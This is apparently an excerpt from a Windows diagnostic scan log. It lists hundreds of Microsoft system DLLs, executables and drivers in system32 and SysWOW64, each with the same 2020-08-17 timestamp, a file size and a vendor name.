2020-08-17 21:33 - 2020-08-17 21:33 - 000283264 _____ (Microsoft Corporation) C:\Windows\system32\bdeunlock.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000283136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000283136 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000282112 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.ConfigWrapper.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000281600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000281600 _____ (Microsoft Corporation) C:\Windows\system32\coredpus.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000280576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Usb.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000280376 _____ (Microsoft Corporation) C:\Windows\system32\Dism.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxAllUserStore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000278080 _____ (Microsoft Corporation) C:\Windows\system32\LsaIso.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000277504 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Lights.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000273744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BCP47Langs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000273744 _____ (Microsoft Corporation) C:\Windows\system32\wkspbroker.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000272384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PickerPlatform.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpviewerax.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000270848 _____ (Microsoft Corporation) C:\Windows\system32\ngctasks.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000270336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptprov.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000268800 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000268552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Storage.ApplicationData.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000267528 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000266752 _____ (Microsoft Corporation) C:\Windows\system32\DAFMCP.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000266552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SystemSettings.DataModel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000265216 _____ (Microsoft Corporation) C:\Windows\system32\shdocvw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000262848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000261016 _____ (Microsoft Corporation) C:\Windows\system32\ProximityUxHost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000260920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000260328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000260288 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000260096 _____ (Microsoft Corporation) C:\Windows\system32\wavemsp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000259584 _____ (Microsoft Corporation) C:\Windows\system32\mpg2splt.ax
2020-08-17 21:33 - 2020-08-17 21:33 - 000259384 _____ (Microsoft Corporation) C:\Windows\system32\AppVFileSystemMetadata.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000257536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\provplatformdesktop.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000256000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore6.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000256000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ConsoleLogon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000253952 _____ (Microsoft Corporation) C:\Windows\system32\BitLockerCsp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000252928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tapisrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000251904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msIso.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000251704 _____ (Microsoft Corporation) C:\Windows\system32\offlinesam.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000251512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsDocumentTargetPrint.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000250880 _____ (Microsoft Corporation) C:\Windows\system32\msutb.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\FileHistory.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000249856 _____ (Gracenote, Inc.) C:\Windows\SysWOW64\gnsdk_fp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000249344 _____ (Microsoft Corporation) C:\Windows\system32\srrstr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000248320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VAN.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000248320 _____ (Microsoft Corporation) C:\Windows\system32\rastapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000247856 _____ (Microsoft Corporation) C:\Windows\system32\weretw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000246584 _____ (Microsoft Corporation) C:\Windows\system32\DataExchangeHost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000245336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExecModelClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000245248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\glu32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000244736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndproxy.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\VideoHandlers.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Gpu.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.CredDialogController.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msltus40.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000240640 _____ (Microsoft Corporation) C:\Windows\system32\dialclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000240128 _____ (Microsoft Corporation) C:\Windows\system32\ssdpsrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000239616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacEncoder.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000239104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mdmregistration.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000237056 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000237056 _____ (Microsoft Corporation) C:\Windows\system32\JpnServiceDS.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000236520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgmgr32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000235520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000235520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDeviceRegistration.Ngc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000235520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shdocvw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000235008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000234496 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000233472 _____ (Microsoft Corporation) C:\Windows\system32\tapi32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000232960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000232448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.System.SystemManagement.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000232448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\ddpchunk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000231424 _____ (Microsoft Corporation) C:\Windows\system32\HoloShellRuntime.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000231224 _____ (Microsoft Corporation) C:\Windows\system32\AppVShNotify.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000230912 _____ (Microsoft Corporation) C:\Windows\system32\RdpRelayTransport.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000230416 _____ (Microsoft Corporation) C:\Windows\system32\AppVStreamMap.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\wersvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\netprofm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000228352 _____ (Microsoft Corporation) C:\Windows\system32\rasplap.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000227840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncSettings.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000227840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sti.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\IndexedDbLegacy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000225792 _____ (Microsoft Corporation) C:\Windows\system32\WorkFoldersShell.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000225280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wavemsp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000224768 _____ (Microsoft Corporation) C:\Windows\system32\DWWIN.EXE
2020-08-17 21:33 - 2020-08-17 21:33 - 000224256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vaultcli.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000224256 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCenter.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000223544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Dism.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000222720 _____ (Microsoft Corporation) C:\Windows\system32\tcpmon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000222208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netplwiz.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000221184 _____ (Microsoft Corporation) C:\Windows\system32\scrrun.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000220984 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000220672 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Scanners.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000219136 _____ (Microsoft Corporation) C:\Windows\system32\wscinterop.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000219136 _____ (Microsoft Corporation) C:\Windows\system32\wmpdxm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000219136 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000219136 _____ (Microsoft Corporation) C:\Windows\system32\P2P.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000217600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bthprops.cpl
2020-08-17 21:33 - 2020-08-17 21:33 - 000217088 _____ (Microsoft Corporation) C:\Windows\system32\tspubwmi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000215040 _____ (Microsoft Corporation) C:\Windows\system32\DiagSvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000214528 _____ (Microsoft Corporation) C:\Windows\system32\srumsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scecli.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000214016 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.CmUtil.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000213984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EditionUpgradeManagerObj.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000211968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000211256 _____ (Microsoft Corporation) C:\Windows\system32\tcbloader.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000210400 _____ (Microsoft Corporation) C:\Windows\system32\xmllite.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000206336 _____ (Microsoft Corporation) C:\Windows\system32\wincredui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000206336 _____ (Microsoft Corporation) C:\Windows\system32\sti_ci.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000206336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndiswan.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000206336 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000205824 _____ (Microsoft Corporation) C:\Windows\system32\cic.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000205312 _____ (Microsoft Corporation) C:\Windows\system32\dmcsps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000205112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winquic.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000204800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mpg2splt.ax
2020-08-17 21:33 - 2020-08-17 21:33 - 000204008 _____ (Microsoft Corporation) C:\Windows\system32\SecurityCenterBroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000203776 _____ (Microsoft Corporation) C:\Windows\system32\regapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000203264 _____ (Microsoft Corporation) C:\Windows\system32\LanguageComponentsInstaller.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000202752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cscobj.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000202552 _____ (Microsoft Corporation) C:\Windows\system32\AppVStreamingUX.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000202240 _____ (Microsoft Corporation) C:\Windows\system32\p2pnetsh.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000201728 _____ (Microsoft Corporation) C:\Windows\system32\puiapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000199680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasplap.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000199680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\accessibilitycpl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000199480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000199168 _____ (Microsoft Corporation) C:\Windows\system32\wmidx.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000197632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.WiFi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000197432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudExperienceHostUser.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000196096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\container.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000194560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\psr.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000194560 _____ (Microsoft Corporation) C:\Windows\system32\recdisc.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000194176 _____ (Microsoft Corporation) C:\Windows\system32\winquic.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SpatializerApo.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000193592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\weretw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000193536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tapi32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000193024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msutb.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000190464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\regapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000190056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logoncli.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000189440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwpolicyiomgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000188928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000188928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000188416 _____ (Microsoft Corporation) C:\Windows\system32\rdsdwmdr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000187920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ifsutil.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schtasks.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasrad.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000186880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWWIN.EXE
2020-08-17 21:33 - 2020-08-17 21:33 - 000186880 _____ (Microsoft Corp.) C:\Windows\system32\Defrag.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000186368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000185952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000185856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DeviceCenter.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000184832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scrrun.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000184320 _____ (Microsoft Corporation) C:\Windows\system32\iasrecst.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000183808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netprofm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000183808 _____ (Microsoft Corporation) C:\Windows\system32\ResetEngOnline.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000183296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DataExchange.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000181760 _____ (Microsoft Corporation) C:\Windows\system32\rdpinput.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000181560 _____ (Microsoft Corporation) C:\Windows\system32\AppVDllSurrogate.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000181248 _____ (Microsoft Corporation) C:\Windows\system32\notepad.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000181248 _____ (Microsoft Corporation) C:\Windows\notepad.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000180224 _____ (Microsoft Corporation) C:\Windows\system32\net1.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000180224 _____ (Microsoft Corporation) C:\Windows\system32\dialserver.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallServiceTasks.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179712 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179712 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Clipboard.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhoneCallHistoryApis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.XamlHost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\twext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\rtm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\PrintWorkflowService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\easwrt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000178192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000178176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srumsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000178176 _____ (Microsoft Corporation) C:\Windows\system32\prntvpt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000177664 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000177664 _____ (Microsoft Corporation) C:\Windows\system32\ConsentUxClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000176952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Management.Workplace.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000176440 _____ (Microsoft Corporation) C:\Windows\system32\uxlib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000176152 _____ (Microsoft Corporation) C:\Windows\system32\imm32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000175616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IndexedDbLegacy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000175104 _____ (Microsoft Corporation) C:\Windows\system32\profsvcext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000174392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\AppvVemgr.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\p2pnetsh.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000174080 _____ (Microsoft Corporation) C:\Windows\system32\sud.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000173568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\P2P.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000173568 _____ (Microsoft Corporation) C:\Windows\system32\drvinst.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000172856 _____ (Microsoft Corporation) C:\Windows\system32\AppVNice.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000172544 _____ (Microsoft Corporation) C:\Windows\system32\msrahc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\puiapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\HoloShellRuntime.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dialclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000170920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xmllite.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000170496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000170496 _____ (Microsoft Corporation) C:\Windows\system32\NcaSvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000168448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EditionUpgradeHelper.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000167936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpdr.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000167136 _____ (Microsoft Corporation) C:\Windows\system32\vertdll.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000166912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpdxm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000166912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Scanners.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000166400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MicrosoftAccountTokenProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000165888 _____ (Microsoft Corporation) C:\Windows\system32\msaatext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000165840 _____ (Microsoft Corporation) C:\Windows\system32\WerFaultSecure.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000165296 _____ (Microsoft Corporation) C:\Windows\system32\dmcmnutils.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000165176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscinterop.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000164776 _____ (Microsoft Corporation) C:\Windows\system32\omadmapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BitLockerCsp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000163328 _____ (Microsoft Corporation) C:\Windows\system32\glu32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000162816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000162816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ErrorDetails.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000162304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDeviceRegistration.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000162304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AuthBroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rtm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cic.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000161632 _____ (Microsoft Corporation) C:\Windows\system32\wldp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000160768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000160768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CapabilityAccessManagerClient.dll
